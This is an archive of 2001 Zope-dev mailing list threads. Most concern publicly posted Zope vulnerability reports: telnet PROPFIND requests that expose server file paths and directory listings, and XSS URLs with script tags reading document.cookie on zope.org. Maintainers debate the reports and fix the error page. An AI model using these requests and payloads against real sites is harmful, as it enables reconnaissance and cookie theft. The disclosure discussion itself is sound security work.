[Zope-dev] questions about writing a DA
hi,all I have got several questions here,and maybe you can give me some advice. What I am trying to do is write a product which can communicate with ODBC Socket Server, a win32 server application that allow applications to have access to Data Sources managed by Windows ODBC DataSource Administrator. And now a class written in python can communicate with ODBC Socket Server. BTW,the class mentioned above handles the connection to the server,sending SQL statement,and Receiving results. As far as I know, in Zope,to access Data Sources,one must create a Database connection and ZSQLMethods associated with it to get the results. (but I have doubt about this, IMHO,there must be some other way to do so,but what is it.). Now,I am rather confused about how to solve the problem. First,is what I need to write a DA? or just a common product? Second,if it's a DA, how can I use the existing class? I have read the article named how to write a DA in the how-tos,but it is quite abstract to me. Third,where can I find more about the DataBase Connection and ZSQLMethod ? especially on how they work together to access databases. OK,I am not sure whether I have made me understood, in fact,I am not quite clear myself. if you have any questions about that,I will reply ASAP. thanks for your great patience,I will be grateful if you can give me some advice. thank you! Best Wishes yours sincerely Steven Lee f^ ëæj)eËY¢züè¥ê+m§ÿåËlÎ^¢¸?¨¥©ÿ+-wèÿ:)yׯ6+¢Ë)¢Ël¢±Ó0·§rb^«^vX¬¶Èm¶ÿ+-³:)zàþf¢f§þX¬¶)ߣüè¥æ§§qèm¶ÿ+-³:)zàþf¢f§þX¬¶)ߣüè¥
[Zope-dev] Vulnerability in Zope
Found vulnerability: retrieve a full path to local files in Zope. ---[ Example 1 (Linux): telnet www.zope.org 80 PROPFIND / HTTP/1.0 F G H J K L HTTP/1.0 500 Internal Server Error Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1 Date: Mon, 10 Sep 2001 15:38:59 GMT Content-Length: 7058 Ms-Author-Via: DAV Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property Sheets.py Bobo-Exception-Type: TypeError Content-Length: 7058 Ms-Author-Via: DAV Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property Sheets.py Bobo-Exception-Type: TypeError Content-Type: text/html Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional// EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML HEAD TITLEWelcome to Zope.org/TITLE link rel=stylesheet href=http://www.zope.org/zope_css; type=text/css /HEAD BODY B Bobo-Exception-Line: 369 ... !-- Traceback (innermost last): File /usr/local/base/Zope-2.3.2-modified/l ib/python/ZPublisher/Publish.py, line 223, in publish_module File /usr/local/ba se/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish F ile /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, i n zpublisher_exception_hook (Object: ApplicationDefaultPermissions) File /us r/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in publish File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.p y, line 160, in mapply (Object: PROPFIND) File /usr/local/base/Zope-2.3.2-mo dified/lib/python/ZPublisher/Publish.py, line 112, in call_object (Object: PR OPFIND) File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py, line 222, in PROPFIND (Object: ApplicationDefaultPermissions) File /usr/loc al/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply Fi le /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, i n apply File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/d avcmds.py, line 219, in apply File /usr/local/base/Zope-2.3.2-modified/lib/pyth on/webdav/davcmds.py, line 175, in apply File /usr/local/base/Zope-2.3.2-modifi ed/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop (Object: Virtu al) TypeError: (see above) -- Host has closed connection. ---[ Example 2 (Linux): telnet www.zope.com 80 / HTTP/1.0 or NOTREALCOMMAND / HTTP/1.0 HTTP/1.0 404 Not Found Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1 Date: Fri, 21 Sep 2001 12:51:48 GMT Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/H TTPResponse.py Content-Type: text/html Bobo-Exception-Type: NotFound Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional// EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML HEAD TITLEWelcome to Zope.org/TITLE link rel=stylesheet href=http://www.zope.org/zope_css; type=text/css /HEAD BODY B Content-Length: 5845 Bobo-Exception-Line: 547 ... !-- Traceback (innermost last): File / usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, i n publish_module File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher /Publish.py, line 187, in publish File /usr/local/base/Zope-2.3.2-modified/lib/ python/Zope/__init__.py, line 221, in zpublisher_exception_hook (Object: Appl icationDefaultPermissions) File /usr/local/base/Zope-2.3.2-modified/lib/python/ ZPublisher/Publish.py, line 173, in publish File /usr/local/base/Zope-2.3.2-mod ified/lib/python/ZPublisher/HTTPResponse.py, line 308, in setBody File /usr/loc
Re: [Zope-dev] Vulnerability in Zope
Do others consider this a vulnerability? While it reveals more information than people might want, I'm curious about scenarios under which it could be exploited. If any of you know of something *specific*, meaning it's a genuinely exploitable vulnerability, please email me or Brian Lloyd ([EMAIL PROTECTED]) directly, rather than explain to the world how to do it. --Paul ALife wrote: Found vulnerability: retrieve a full path to local files in Zope. ---[ Example 1 (Linux): telnet www.zope.org 80 PROPFIND / HTTP/1.0 F G H J K L HTTP/1.0 500 Internal Server Error Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1 Date: Mon, 10 Sep 2001 15:38:59 GMT Content-Length: 7058 Ms-Author-Via: DAV Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property Sheets.py Bobo-Exception-Type: TypeError Content-Length: 7058 Ms-Author-Via: DAV Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property Sheets.py Bobo-Exception-Type: TypeError Content-Type: text/html Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional// EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML HEAD TITLEWelcome to Zope.org/TITLE link rel=stylesheet href=http://www.zope.org/zope_css; type=text/css /HEAD BODY B Bobo-Exception-Line: 369 ... !-- Traceback (innermost last): File /usr/local/base/Zope-2.3.2-modified/l ib/python/ZPublisher/Publish.py, line 223, in publish_module File /usr/local/ba se/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 187, in publish F ile /usr/local/base/Zope-2.3.2-modified/lib/python/Zope/__init__.py, line 221, i n zpublisher_exception_hook (Object: ApplicationDefaultPermissions) File /us r/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 171, in publish File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/mapply.p y, line 160, in mapply (Object: PROPFIND) File /usr/local/base/Zope-2.3.2-mo dified/lib/python/ZPublisher/Publish.py, line 112, in call_object (Object: PR OPFIND) File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/Resource.py, line 222, in PROPFIND (Object: ApplicationDefaultPermissions) File /usr/loc al/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply Fi le /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, i n apply File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/davcmds.py, line 219, in apply File /usr/local/base/Zope-2.3.2-modified/lib/python/webdav/d avcmds.py, line 219, in apply File /usr/local/base/Zope-2.3.2-modified/lib/pyth on/webdav/davcmds.py, line 175, in apply File /usr/local/base/Zope-2.3.2-modifi ed/lib/python/OFS/PropertySheets.py, line 369, in dav__allprop (Object: Virtu al) TypeError: (see above) -- Host has closed connection. ---[ Example 2 (Linux): telnet www.zope.com 80 / HTTP/1.0 or NOTREALCOMMAND / HTTP/1.0 HTTP/1.0 404 Not Found Server: Zope/Zope 2.3.2 (source release, python 1.5.2, linux2) ZServer/1.1b1 Date: Fri, 21 Sep 2001 12:51:48 GMT Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/H TTPResponse.py Content-Type: text/html Bobo-Exception-Type: NotFound Bobo-Exception-Value: !DOCTYPE HTML PUBLIC -//W3C//DTD HTML 4.0 Transitional// EN http://www.w3.org/TR/REC-html40/loose.dtd; HTML HEAD TITLEWelcome to Zope.org/TITLE link rel=stylesheet href=http://www.zope.org/zope_css; type=text/css /HEAD BODY B Content-Length: 5845 Bobo-Exception-Line: 547 ... !-- Traceback (innermost last): File / usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher/Publish.py, line 223, i n publish_module File /usr/local/base/Zope-2.3.2-modified/lib/python/ZPublisher /Publish.py, line 187, in publish File /usr/local/base/Zope-2.3.2-modified/lib/ python/Zope/__init__.py, line 221, in zpublisher_exception_hook
Re: [Zope-dev] questions about writing a DA
I just took a look at ODBC Socket Server, which I had never seen before. Pretty interesting! Here's some comments. 1) It looks like socket server opens a new socket for processing every request. In this respect, it goes against one of the benefits of database adapters, which keep a persistent connection. 2) Architecturally, socket server is very similar to web services. See the fishbowl proposal at dev.zope.org for more info. Thus, the approach that Zope would do for web services might have some similarity to what you'd like to do. Alternatively, take a look at the adapter for Ultraseek search engine at http://www.zope.org/Members/brianh/UltraseekDA. It gives a model that might be useful to you. 3) Zope's approach of having separate objects that handle database connections provide the benefit that regular objects can't just fire up socket connections. You want a model that helps prevent all of Zope's threads from being stuck waiting on responses to socket requests. 4) SQL Methods provide some useful and important machinery for your socket server approach. First, I think you want site developers to think your thing is exactly the same as a regular SQL Method. Also: - You likely want to keep the arguments list approach, to prevent people from inserting malicious data into the SQL requests. - Even more than with current database adapters, you want to retain the caching feature in SQL Methods. - Shoving the results into the Recordset code is something you might want to keep. - Etc. Good luck, this looks like a useful project! --Paul StevenLee wrote: hi,all I have got several questions here,and maybe you can give me some advice. What I am trying to do is write a product which can communicate with ODBC Socket Server, a win32 server application that allow applications to have access to Data Sources managed by Windows ODBC DataSource Administrator. And now a class written in python can communicate with ODBC Socket Server. BTW,the class mentioned above handles the connection to the server,sending SQL statement,and Receiving results. As far as I know, in Zope,to access Data Sources,one must create a Database connection and ZSQLMethods associated with it to get the results. (but I have doubt about this, IMHO,there must be some other way to do so,but what is it.). Now,I am rather confused about how to solve the problem. First,is what I need to write a DA? or just a common product? Second,if it's a DA, how can I use the existing class? I have read the article named how to write a DA in the how-tos,but it is quite abstract to me. Third,where can I find more about the DataBase Connection and ZSQLMethod ? especially on how they work together to access databases. OK,I am not sure whether I have made me understood, in fact,I am not quite clear myself. if you have any questions about that,I will reply ASAP. thanks for your great patience,I will be grateful if you can give me some advice. thank you! Best Wishes yours sincerely Steven Lee f? ?j)e?Y+?m?^8.??+-???:)y?6?+(7))(7)l1.?r??^?^vX?+-?:)z???f?X?)?q+-?:)z???f?X?)??pe== ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] Vulnerability in Zope
On Sun, Sep 23, 2001 at 10:36:33AM -0400, Paul Everitt wrote: Do others consider this a vulnerability? While it reveals more information than people might want, I'm curious about scenarios under which it could be exploited. If any of you know of something *specific*, meaning it's a genuinely exploitable vulnerability, please email me or Brian Lloyd ([EMAIL PROTECTED]) directly, rather than explain to the world how to do it. ... ... Bobo-Exception-File: /usr/local/base/Zope-2.3.2-modified/lib/python/OFS/Property Think about social engeniering. Knowing this sort of things, while this is not a vulnerability in itself, allows everybody to remotely know were Data.fs is. bye, Jerome Alet ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
[Zope-dev] New: Cross Site Scripting vulnerability
Example: http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT http://www.zope.org/lalalalalSCRIPTalert(document.domain)/SCRIPT http://www.zope.org/SCRIPTalert(document.cookie)/SCRIPT For example, an attacker might post a message like Hello message board. This is a message. SCRIPTmalicious code/SCRIPT This is the end of my message. When a victim with scripts enabled in their browser reads this message, the malicious code may be executed unexpectedly. Scripting tags that can be embedded in this way include SCRIPT, OBJECT, APPLET, and EMBED. ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] Vulnerability in Zope
Do others consider this a vulnerability? Yup... especially given the hard-coded (sigh) error page returned for authentication error gives out this information :-( Chris ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] New: Cross Site Scripting vulnerability
Hello message board. This is a message. SCRIPTmalicious code/SCRIPT This is the end of my message. I don't really see your point other than a carelessly implemented app may expose these kind of vulnerabilities. Python (and hence Zope) has a library for stripping out this sort of malicious HTML. Search for Strip-o-Gram or Squishdot on Zope.org for examples of how this can be used. cheers, Chris ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
[Zope-dev] Vulnerability: attacking can get file list and directory
Vulnerability: attacking can get file list and directory Tested on Win32 platform Example: telnet zopeserver 8080 PROPFIND / HTTP/1.0 enter enter enter list files and directory This tested on my site: security.instock.ru 8080 ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] New: Cross Site Scripting vulnerability
Aargh, I sent that first to [EMAIL PROTECTED] ... Hello message board. This is a message. SCRIPTmalicious code/SCRIPT This is the end of my message. I don't really see your point other than a carelessly implemented app may expose these kind of vulnerabilities. Python (and hence Zope) has a library for stripping out this sort of malicious HTML. Search for Strip-o-Gram or Squishdot on Zope.org for examples of how this can be used. umm chris, you're right, but this example http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT executes the script. I don't exactly see why/where but I feel this really shouldn't happen. As I see it, it's more a problem of zope's standard_error page, which constructs links to the classic zope site. I don't see a zope-specific bug here, too. cheers, oliver ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] Vulnerability in Zope
Haven't we been complaining about this automatic appending of tracebacks for a while? To me this is what log files are for but Im not sure what this guy is on. I wouldnt count this as a security vulnerability. - Original Message - From: Chris Withers [EMAIL PROTECTED] To: Paul Everitt [EMAIL PROTECTED]; ALife [EMAIL PROTECTED] Cc: [EMAIL PROTECTED] Sent: Sunday, September 23, 2001 10:44 AM Subject: Re: [Zope-dev] Vulnerability in Zope Do others consider this a vulnerability? Yup... especially given the hard-coded (sigh) error page returned for authentication error gives out this information :-( Chris ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope ) ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] New: Cross Site Scripting vulnerability
What does this have to do with Zope? Its down to an individual application. - Original Message - From: ALife [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, September 23, 2001 10:23 AM Subject: [Zope-dev] New: Cross Site Scripting vulnerability Example: http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT http://www.zope.org/lalalalalSCRIPTalert(document.domain)/SCRIPT http://www.zope.org/SCRIPTalert(document.cookie)/SCRIPT For example, an attacker might post a message like Hello message board. This is a message. SCRIPTmalicious code/SCRIPT This is the end of my message. When a victim with scripts enabled in their browser reads this message, the malicious code may be executed unexpectedly. Scripting tags that can be embedded in this way include SCRIPT, OBJECT, APPLET, and EMBED. ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope ) ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] DISCUSS: Community checkins for CVS
I imagine that the group will decide rules on peer reviewing. For comparison, the Mozilla group has very elaborate rules for checkins, while Python has pretty much an innocent until proven guilty culture. (That is, you check something in, and if somebody complains, it gets removed.) I don't think it is worthwhile trying to form these rules a priori. That's fine. I just wanted to put it onto the agenda ... We need rules like NO FIXES BETWEEN FINAL BETA AND RELEASE (Absolutely no fixes I mean) -- and those rules should apply to everybody. Again, we'll let the rules come out of the group. For instance, what if an Emacs #foo.py# accidentally got checked in? Would you really require another beta release for that? Betas are a cost incurred by hundreds of people around the world. My personal opinion is that, apart from the version number, a final beta should be exactly the same as the actual release. Accidentally checked-in stuff can cause accidents. So there is some reason for a careful release policy. But in your specific case, if the final beta that should lead to a release has been actually released (and tagged in the CVS), how should somebody be able to check something into it afterwards? That could only happen if there are problems with the CVS configuration and usage I guess ... Ahh, the it's the Wiki's fault argument. I just checked the zip mailing list archive. 9 messages since Aug 1st. So neither email nor Wiki are good choices. Can you point to an example of a process that worked better for designing APIs? I don't blame the Wiki in general. Wikis (together with mailing lists) are a good start. Sometimes we'd just need real meetings on real conferences I guess ... Joachim ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] New: Cross Site Scripting vulnerability
Example: http://www.zope.org/Documentation/SCRIPTalert(document.domain)/SCRIPT http://www.zope.org/lalalalalSCRIPTalert(document.domain)/SCRIPT http://www.zope.org/SCRIPTalert(document.cookie)/SCRIPT For example, an attacker might post a message like Hello message board. This is a message. SCRIPTmalicious code/SCRIPT This is the end of my message. When a victim with scripts enabled in their browser reads this message, the malicious code may be executed unexpectedly. Scripting tags that can be embedded in this way include SCRIPT, OBJECT, APPLET, and EMBED. First of all, I would appreciate it if you could send alleged security problems to us in private, and not advertise these on a public mailinglist. I know that you had posted your previous ;discovery' to us in private some time before you took it to the public lists, but the time given to us to craft a response to your email was by far too short. One week would have been the absolute minumum! Secondly, could you in future also describe the exact problem in more detail? I assume that you mean a malicious third party could in theory abuse our server to create a page with malicious client-side code by crafting a message on a message board or in an email, right? Your manner of posting could suggest to others that the vulnerability lies with Zope itself, not with browsers allowing malcious code via a generated web page. Third, the 'classic.zope.org' link on the Zope.org error page has long been overdue for removal, especially since classic is now down. I have removed the auto-generated link to it. -- Martijn Pieters | Software Engineer mailto:[EMAIL PROTECTED] | Zope Corporation http://www.zope.com/ | Creators of Zope http://www.zope.org/ - ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )
Re: [Zope-dev] Vulnerability: attacking can get file list and directory
Vulnerability: attacking can get file list and directory Tested on Win32 platform Example: telnet zopeserver 8080 PROPFIND / HTTP/1.0 enter enter enter list files and directory This tested on my site: security.instock.ru 8080 This one really seems to be the old WebDAV is not safe one. I guess it has been tackled already. You should be able to switch the file listing off for the Anonymous User in Zope 2.4.1 ... Joachim ___ Zope-Dev maillist - [EMAIL PROTECTED] http://lists.zope.org/mailman/listinfo/zope-dev ** No cross posts or HTML encoding! ** (Related lists - http://lists.zope.org/mailman/listinfo/zope-announce http://lists.zope.org/mailman/listinfo/zope )